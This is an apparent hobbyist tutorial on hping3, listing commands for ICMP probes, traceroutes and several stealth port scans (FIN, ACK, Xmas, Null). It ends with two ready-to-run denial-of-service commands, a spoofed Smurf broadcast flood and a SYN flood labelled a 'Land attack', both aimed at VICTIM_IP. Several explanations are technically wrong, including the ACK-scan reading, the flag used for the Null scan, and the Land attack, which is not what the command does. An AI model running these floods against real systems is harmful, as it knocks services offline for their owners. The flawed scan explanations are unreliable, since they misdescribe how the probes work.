Hping3 Tutorial With firewall

Hello, Today I will show you how to use hping3 for network mapping.

Hping3 :-->
Hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation, and almost arbitrary packet size and content, using the command line interface.

  1. Testing ICMP :

    hping3 will behave like a normal ping utility, sending ICMP-echo und receiving ICMP-reply

    hping3 -1 [Ip_Address]
  2.  Traceroute using ICMP :

    In this example tracert (windows) or traceroute (linux) who uses ICMP packets increasing every time in 1 its TTL value.

    hping3 --traceroute -V -1 [Ip_Address]
     
  3. Checking port :

    Hping3 will send a Syn packet to a specified port (80 in our example). We can control also from which local port will start the scan (5050).

    hping3 -V -S -p 80 -s 5050 [Ip_Address]

  4. Traceroute to a determined port :

    Hping3 is that you can do a traceroute to a specified port watching where your packet is blocked.

    hping3 --traceroute -V -S -p 80 -s 5050 [Ip_Address]
  5. Other types of ICMP :

    This example sends a ICMP address mask request ( Type 17 ).

    hping3 -c 1 -V -1 -C 17 [Ip_Address]
  6. Other types of Port Scanning :

    First type we will try is the FIN scan. In a TCP connection the FIN flag is used to start the connection closing routine. If we do not receive a reply, that means the port is open. Normally firewalls send a RST+ACK packet back to signal that the port is closed..

    hping3 -c 1 -V -p 80 -s 5050 -F [Ip_Address]
  7. Ack Scan :

    This scan can be used to see if a host is alive (when Ping is blocked for example). This should send a RST response back if the port is open.

    hping3 -c 1 -V -p 80 -s 5050 -A [Ip_Address]
  8. Xmas Scan :

    This scan sets the sequence number to zero and set the URG + PSH + FIN flags in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP Xmas scan, sending no reply.

    hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF [Ip_Address]
  9. Null Scan :

    This scan sets the sequence number to zero and have no flags set in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP NULL scan, sending no reply.

    hping3 -c 1 -V -p 80 -s 5050 -Y [Ip_Address]

  10. Smurf Attack :

    This is a type of denial-of-service attack that floods a target system via spoofed broadcast ping messages.

    hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS
     
  11. DOS Land Attack :
    hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP


Thank you (zer0w0rm)